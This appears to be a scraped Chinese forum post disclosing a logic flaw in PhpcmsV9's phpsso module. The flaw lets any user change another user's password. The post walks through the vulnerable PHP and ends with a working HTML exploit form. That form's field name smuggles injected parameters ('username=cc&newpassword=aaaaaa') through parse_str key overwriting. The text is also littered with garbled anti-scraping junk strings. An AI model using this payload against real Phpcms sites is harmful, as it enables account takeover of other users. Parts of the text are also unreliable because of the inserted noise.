PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

admin

提到的通行证的代码：
  b5 M/ e4 S: [* B

) d: P" n+ _" |) o! lparse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);

在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。

0 B+ X6 b2 h: M) n$ {我把它留给了你们。
不知道你们发现了它没有。
+ y, m. G! ?6 G) L" u  ^
我们知道parse_str类似将http请求转换成php变量的函数，所以，也像http请求在php的环境下一样，如果提交?a=sss&a=aaa，那么a的结果会是aaa，不是sss。
. W8 x* d/ b/ z* A
所以我们知道这个函数有一个问题了，如果后面提交一个内容，它会覆盖前面的。

也就是

username=zhangsan&username=lisi的话，那么用户名就不是zhangsan了。
- F0 h: F0 n, n8 j& x7 h" x) X' W
) j' }& c( `8 M) c" E要构造这样的请求，我们还是要回到通行证的client看看，我们有没有这样的机会。
' O8 Y5 N, B$ s/ Z  u) U

; E1 S: ^, ^9 i# G0 f其实我们有这样的机会，看看代码，如下：
+ t* z" w3 m4 x  G$ r3 E. B  y3 R+ D
4 Z$ G# Y9 Q4 }' b+ o
public function auth_data($data) {
                $s = $sep = '';
/ [+ o8 U& p4 {                foreach($data as $k => $v) {
2 v: I1 o/ ^" _$ ]5 N! m/ B                        if(is_array($v)) {
; k4 G: _) }) p! s( i0 r                                $s2 = $sep2 = '';
                                foreach($v as $k2 => $v2) {
; O# P% _0 d, [9 n                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
                                        $sep2 = '&';
                                }
                                $s .= $sep.$s2;
" U6 Y6 e; K. r) T4 Q                        } else {
+ ?! Q( Z/ y% Y" `                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
                        }
                        $sep = '&';
                }
; s1 x; _  P, y& k
                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
                return $auth_s;
8 m- D7 ~* L% I8 Q3 m! x        }
/ C( G4 u+ F0 {: ^
8 u, F5 V: L& H! w1 h  ^( l可能我没说明白，对，传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话，那么我就能重写这样的东西。

* f# Y2 e5 \' _* U6 y- P5 O举个例子

$a[aaa=a&bbb] = 'a';

! Q1 Z& M+ M/ F6 [$ v. h3 T0 N# o会变成aaa=a&bbb=a

% l8 m  B! k: S2 m" w明白了么，对，就是通过没有注意到的key，我们可以构造出多余的参数来。

" G, k+ q& r; Q: H& h& _这个时候，我们可以再去看一个函数。

5 l) B- ~  z2 M( {% v就在这个文件内：

, \8 c8 ^7 O/ P( y6 s
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
! k$ r  g0 C5 \8 H9 N                if($email && !$this->_is_email($email)) {
                        return -4;
0 O( z9 x* q# f+ J5 C( V) ^                }
                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
        }
" Y+ ?# U& _6 e, }/ n# h& B
这是向通行证发了这样一个请求。
; T( r9 T' R+ d1 N: j
+ \1 N: o% t; O! {+ \我们再跟到通信证代码里去看看，就会有所发现。
% H1 B! g! ?1 D
* _  w* ~9 T0 _5 x
public function edit() {
//能省就省，太长了不是吗？

( ]0 u, q( R% ?: z) z4 f! |* qif($this->username) {
//如果提交了用户名，则按照用户名修改记录，反之，按照uid来修改记录。
! U. B, Z7 B, N2 Y4 |                                $res = $this->db->update($data, array('username'=>$this->username));
; _( {1 I! }. A$ Q                        } else {
; L4 x7 D9 K7 b, h: C6 o                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
/ U: p1 C$ i9 _                                $res = $this->db->update($data, array('uid'=>$this->uid));
                        }
+ {% J9 v9 e: ~3 I
) |! Q: B4 d  s* F& ?好，我们知道了，如果提交了用户名，就会按照用户名来修改记录，不然就按照uid，我们看看函数结构：
) D& }' |3 a$ v6 u
0 |3 P5 S# l4 I4 Fpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')

+ U! x" L- W1 W3 W) s8 m很好，uid要是无法控制的话，后面只剩下一个random了，但是username就在第一个，只要email，password，newpassword，有任何一个可以控制，就可以修改密码了。
$ V3 @# F! e' S* E4 q5 }+ d+ g
我当然找到了：
5 S- O# B) g0 Q# e8 o4 Cphpcms9/phpcms/modules/member/index.php
$ }( k( J0 |7 j( j
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);

然后就没有然后了。

<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
- Z( t* y% }3 R! Y$ K! [                                <table width="100%" cellspacing="0" class="table_form">
                                        <tr>
# `" |% e+ r! P$ _7 [; v4 ]                                                <th width="80">邮箱：</th>        
- E# {& C6 R* V                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
                                        </tr>
2 @( J* Z" b" l5 b6 c" j8 i                                        <tr>
4 f/ Z, ]. ~! R/ x2 i- s+ a                                                <th width="80">原密码：</th>        
                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
                                        </tr>
                                        <tr>
                                                <th>新密码：</th>
6 D- h2 |. X4 h# U0 F2 {6 B" h                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
                                        </tr>
  i: w; {1 ]0 H' c0 h& S                                        <th></th>
                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
                                        </tr>
                                </table>

                               
) V9 H5 U" m2 }, Z9 u9 J                        </form>
) ]6 L/ X% R: b, l